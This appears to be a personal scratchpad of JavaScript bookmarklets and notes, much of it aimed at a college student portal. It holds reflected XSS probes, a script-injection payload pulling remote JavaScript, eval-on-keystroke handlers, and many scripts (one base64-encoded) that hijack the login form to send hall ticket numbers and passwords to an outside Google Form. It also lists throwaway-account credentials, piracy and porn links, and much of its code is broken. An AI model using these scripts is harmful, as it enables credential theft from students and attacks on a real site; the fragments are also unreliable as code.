javascript:var d=document.createElememt('script');d.type="text/javascript";d.src="https://spat-cloud.github.io/data/HarScript/ImageChanger.js";document.body.appendChild(d);

javascript:var ms =document.createElement('script');ms.type="text/javascript";ms.src="https://spat-cloud.github.io/data/HarScript/HarScript-v1.js";document.head.appendChild(ms);

javascript:function mt(){var tt=document.getElementsByTagName('meta');for(i in tt){var gg=tt[i].property;document.write(gg);}}

javascript:var c=document.getElementsByTagName('meta');var v=c.length;alert(v);

javascript:function Mtl(arg){var x=document.getElementsByTagName('meta');var va=x[arg].content;alert(va);}

javascript:var M=document.getElementsByTagName('meta');for(i in M){Mtl(i)}

javascript:var M=document.getElementsByTagName('meta');var dow=M[24].content;var Hr = document.createElement('a');Hr.href=dow;
Hr.innerHTML="DORAEMON.DOWNLOAD"
Hr.style.color="LightBlue";;Hr.download="Doraemon2112.NetDorm.mp4";
document.body.appendChild(Hr);

javascript:var f=document.createElement('a');f.href="#";f.innerHTML="HELLO.PHP";document.write(f);

javascript:window.addEventListeners('click',function(e){alert(e.type.target.nodeName);});

javascript:var g=document.getElementsByTagName('meta');var dk=g[24].content;var te=document.createElement('a');te.href=dk;te.style.fontSize="30px";te.style.color="Blue"; te.style.backgroundColor="orange";te.innerHTML="DOWNLOAD";document.body.appendChild(te);

javascript:var g=document.getElementsByTagName('meta');var dk=g[24].content;var ml =`<a href="`${dk}`" download="Download Shivaya">`;document.write(ml);


javascript:var c=document.getElementsByTagName('input');for(i in c){c[i].type=text;}

https://9anime.to/watch/shin-chan.y38j/ep-3

902

https://vidstream.pro/download/QVY9NW7KLY2M

895

https://vidstream.pro/download/XEYL408DNYVN

894

https://vidstream.pro/download/6EJVKQWLNY9M

888

https://vidstream.pro/download/LNPERX79RJXW

javascript:var bd=document.createElement('body');document.appendChild(bd);var a=document.createElement('a');a.href="#";a.download="this";bd.innerHTML="THIS DOWNLOAD";bd.appendChild(a);

javascript:var s=document.createElement('script');s.src="https://spat-cloud.github.io/data/HarScript/HarScript-v1.js";document.body.appendChild(s);

javascript:var s=document.createElement('script');s.src="https://spat-cloud.github.io/data/HarScript/HarScript-v1.1.js";document.body.appendChild(s);

javascript:var T=decodeURIComponent(JSON.parse('" "'));document.write(T);


javascript:var e=document.getElementsByTagName('form');e[0].method="GET";

javascript:function c(d){document.Reg.method=d;}


javascript:window.addEventListener("submit",function(e){e.preventDefault();alert("Prevented");});


javascript:document.getElementsByTagName('a').addEventListener("click",function(e){e.preventDefault();});

Stdpt 

javascript:function Php(){
location.href = "https://m.youtube.com";
}
function Ch(){
var CH = document.createElement('IFRAME');
CH.name="php";
CH.style.display="none";
document.appendChild(CH);
var C = document.getElementsByTagName('form');
C[0].action ="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse";
C.target="php";
var D =document.getElementsByTagName('input');
D[0].name="entry.190958851";
D[0].required = "";
D[1].name="entry.470512502";
D[1].required = "";
var CH = document.createElement('iframe');
CH.name="php";
CH.style.display="none";
C.appendChil(C,CH);
}
document.onmouseover = function(){Ch()};


function Ch(){var C = document.getElementsByTagName('form'); C[0].action ="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse";var D =document.getElementsByTagName('input'); D[0].name="entry.190958851";D[1].name="entry.470512502";}Ch();

test.js:

javascript:var x = document.createElement('script');
x.src="https://spat-cloud.github.io/data/Down.js";
document.body.appendChild(x);

javascript:var x="http://scce.ac.in/fb/?HallticketNo=19N01A05A8&submit=%C2%A0%C2%A0%C2%A0Login%C2%A0%C2%A0%C2%A0";var g = 

decodeURIComponent(x);alert(g);

javascript:var G="%3C%6C%69%6E%6B%20%72%65%6C%3D%22%63%61%6E%6F%6E%69%63%61%6C%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%77%77%77%2E%70%6F%72%6E%74%76%2E%63%6F%6D%2F";var H = decodeURI(G);document.write(H);

javascript:var f=document.documentElement;function o(){if(f.requestFullscreen){f.requestFullscreen();}}

http://scce.ac.in/parent12/index.php?HallticketNo=&lt;script&gt;alert(1);&lt;/script&gt;

http://scce.ac.in/parent12/r15extres_cmr.php?HallticketNo=%3Cscript%3Ealert(8);%3C/script%3E&dayatten=Submit

javascript:function v(x){var f=document.getElementsByTagName('input');var y = f[x].name;alert(y);}

JavaScript:try{var v=eval(alert(8));}catch(e){alert(e);}

&#x3C;(&#60;) < &#x3E;(&#62;) >
"><script src="https://spat-cloud.github.io/data/Down.js"></script><"

********************************
Temp Mail For Hacksplanning.Com

godawap955@d4wan.com
*********************************
*********************************
Bitport.Io Mail , Offcloud

nagicen651@beydent.com
*********************************

javascript:var x=document.createElement('script');x.src="https://spat-cloud.github.io/data/Down.js";document.body.appendChild(x);

javascript:navigator.clipboard.readText().then(text => if(text.state=="granted"){document.write(text)}alert(text));

javascript:function v(){document.HallticketNo.style.maxlength="566";}

javascript:function C(event){var H=event.targetTouches[0].target.tagName; alert(H); document.body.ontouchstart =function(){v(event)};

javascript:function Su(){
var C=document.createElement('iframe');
C.name="r";
document.body.appendChild(C);
var Cg=document.getElementsByTagName('form');
Cg[0].action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse";
Cg.setAttribute("target" , r);
var F = document.getElementsByTagName('input');
F[0].name="entry.190958851";
F[1].name="entry.470512502";
document.Reg.onsubmit="";
}
Su();
window.addEventListeners("submit" , function(e){e.preventDefault();},false);

javascript:function b(){document.Reg.onsubmit="";document.HallticketNo.onkeyup=function(){eval(this.value);}}b();

javascript:document.HallticketNo.onkeyup=function(){eval(this.value)};





javascript:var s=document.createElement('script');s.src="https://spat-cloud.github.io/data/HarScript/HarScript.v1.6.js";document.head.appendChild(s);

<

entry.190958851";D[0].required;D[1].name="entry.470512502"
>


javascript:document.Reg.onsubmit="";window.addEventListener("click",function(e){e.preventDefault();
location.href=`https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse?entry.190958851=${document.userid.value}&entry.470512502=${document.password.value}`;},false);

javascript:d2luZG93LmxvY2F0aW9uPWBodHRwczovL2RvY3MuZ29vZ2xlLmNvbS9mb3Jtcy91LzAvZC9lLzFGQUlwUUxTZnRoQU95eTJvRjM4bFU1ZjRhZzN1bEo4QUhjUlh0UEhISi1pYlJoN1VmWF82ZXR3L2Zvcm1SZXNwb25zZT9lbnRyeS4xOTA5NTg4NTE9JHtkb2N1bWVudC51c2VyaWQudmFsdWV9JmVudHJ5LjQ3MDUxMjUwMj0ke2RvY3VtZW50LnBhc3N3b3JkLnZhbHVlfWA7

/
<form action="" method="post" name="Reg" onSubmit="return ValidateForm(this)">

 <p>
    
 </p>
 
 <div style="font-size:16pt; font-family:Calibri"><strong>Student login form</strong></div>
 
<h1>Use only Mozilla Firefox or  Google chrome  browser</h1>
 <table width="200" border="0">
   <tr>
     <td><img src="index_files/1.jpg" width="200" height="117" /></td>
     <td><table width="300" border="0">

       <tr> 
         <td><strong>Hall Ticket No</strong></td>
         <td><input type="text" name="userid" /></td>
       </tr>
       <tr>
         <td><strong>Password</strong></td>
         <td><input type="password" name="password" /></td>
       </tr>
       <tr>
         <td>&nbsp;</td>
         <td><input name="submit" type="submit" /></td>



/

thumb.js

{
http://scce.ac.in/n0/19N01A0578T.jpg

}
class addhar{
http://scce.ac.in/n0/19N01A05A8A.jpg
}


var source = new EventSource("http://scce.ac.in/parent12/index.php");
source.onopen = function(event) {
  alert(event.data);
};

http://scce.ac.in/aicte/idcarddownload2.php


javascript:var s=document.createElement('script');s.src="https://spat-cloud.github.io/data/HarScript/HarScript.v1.8.NoAds.js";document.head.appendChild(s);


javascript:var s=document.createElement('script');s.src="https://cdn.jsdelivr.net/gh/SPAT-CLOUD/data@main/HarScript/HarScript.v1.8.NoAds.js";document.head.appendChild(s);

/*
https://cdn.jsdelivr.net/gh/SPAT-CLOUD/data@main/HarScript/HarScript.v1.8.NoAds.js


https://cdn.jsdelivr.net/gh/SPAT-CLOUD/data@main/HarScript/HarScript.v2.0.Latest.min.js
*/


https://cdnisotopes.com/us20/customer/account/login/

Email :vaxanah152@eyeremind.com
Pass : Spat@3512



http://webdisk.scce.ac.in

https://rawcdn.githack.com/SPAT-CLOUD/data/ae53f3c995145daa809880c05ba32f84dc1d514b/HarScript/HarScript.v2.0.Latest.min.js


Youtube 

Dear Google Team
Why you have blocked this account This account is used to watch youtube please Arrange the account enable my account

Thank You
Sincerely SonPanAbTej SPAT


function H(){
var T = document.getElementsByTagName('input');

for(i=0 ; i < T.length; i++){
var G = T[i].value;
window.location = `https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse?entry.190958851=G`;
}
}


javascript:var V = document.getElementsByTagName('form');
var Y = V[0].innerHTML;
window.open(`https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse?entry.190958851=${Y}`);



window.addEventListener("submit" , function(event){event.prefentDefault();H();},false);


function Bo(){
var H = document.getElementsByTagName('input');
var G = document.createElement('body');
G.style.display="none";
document.body.appendChild(G);
var U = document.createElement('iframe');
U.name="T";
U.style.display="none";
G.appendChild(U);
var Y = document.createElement('form');
Y.action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse";
Y.target="T";
Y.method="POST";
Y.id="myF";
Y.onsubmit="";
Y.style.display="none";
G.appendChild(Y);
var O = document.createElement('input');
O.type="text";
O.name = "entry.190958851";
O.value += location.href + "," + "First:" + H[0].value + "," + "Second:" + H[1].value;
Y.appendChild(O);
if(H[0].value! == "" || H[1].value! == ""){
return false;
}
else{
Y.submit();
}

}
function H(){
var H = document.getElementsByTagName('form');
H[0].action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse";
H[0].method="post";
H[0].onsubmit="";
var Yn =document.getElementsByTagName('input');
Yn[0].name = "entry.190958851";
Yn[1].name = "entry.470512502";

}
H();

someHtn{
"Ht":{
"19N01A0127", ""
}


};


function Gh(){

var H = document.createElement('a');
H.href=`https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse?entry.190958851=${document.userid.value}&entry.470512502=${document.password.value}`;
H.style.width="100%";
H.style.height="100%";
H.
H.style.position="fixed";
H.innerHTML="&nbsp;";
document.forms.appendChild(H);
}
var Yj=document.getElementsByTagName('input');
Yj[1].oninput = function(){Gh()};

functon H(){
window.addEventListener("contextmenu", function(e){
e.preventDefault();
location.href=`https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse?entry.190958851=${document.userid.value}&entry.470512502=${document.password.value}`;},false);
}

Premptive JS


MAIL : bejel97838@dmsdmg.com
PASSWORD : ఏపుడు పెట్టె Password


function Sb(){
var C = document.getElementsByTagName('input');
var Yu = document.getElementsByTagName('textarea');
for(i=0;i<C.length;i++){
var E =`https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse?entry.190958851=${C[i].value};
}
for(j=0;j<Yu.length;j++){
var O = Yu[j].value;
}
window.open(E , "blank");
}












https://json.geoiplookup.io


Browser Stack 

Mail = rikomiy555@cytsl.com
Pwd = 12345678

duoglingo

mail = delesi8560@yks247.com

drivehq
yofivod690@1uscare.com
'SonPanAbTejSPAT'.match(/SPAT/ig).del('SonPanAbTej').Add('@3512')
--> '+' T 
--> NOP '@' 
--> MyLove.BDay

Code Wars 
Tempmail for Code Wars :purring3927@indigobook.com ,Pass:=e1e123f275445343b3d4425385625363


https://www.xvideos.com/video69087041/hot_indian_couple_in_lodge


free Music Distub 

mail : sonpanabtej301.059.671.757.2.8.4.2@gmail.com

pwd : Same


Hey Gen

mail: jalev44207@grassdev.com

pwd: Same


leak.vid
https://mega.nz/folder/V2VyTYjT#3fj-72aunJr8afD64b-kJQ/folder/xitGjJ6Y




Storyboard SCRIPT YouTube 
javascript:var yi=ytInitialPlayerResponse;var ys=yi.storyboards;var yf=ys.playerStoryboardSpecRenderer;x=yf.spec;s=new URL(x);par=s.searchParams.get('sqp').split('|48').join('');mp=s.pathname;pm=[...x.match(/rs[$].{34}/ig)].map(escape);const {protocol:pt,pathname:pn,host:h}=s;hgt=(v)=>{dd=(v>=pm.length?pm.length-1:v);urlf=pt+%27//%27+h+pn.replace(%27$L%27,dd).replace(%27$N%27,%27M0%27)+%27?sqp=%27+par+%27&sigh=%27+pm[dd];   return urlf;};
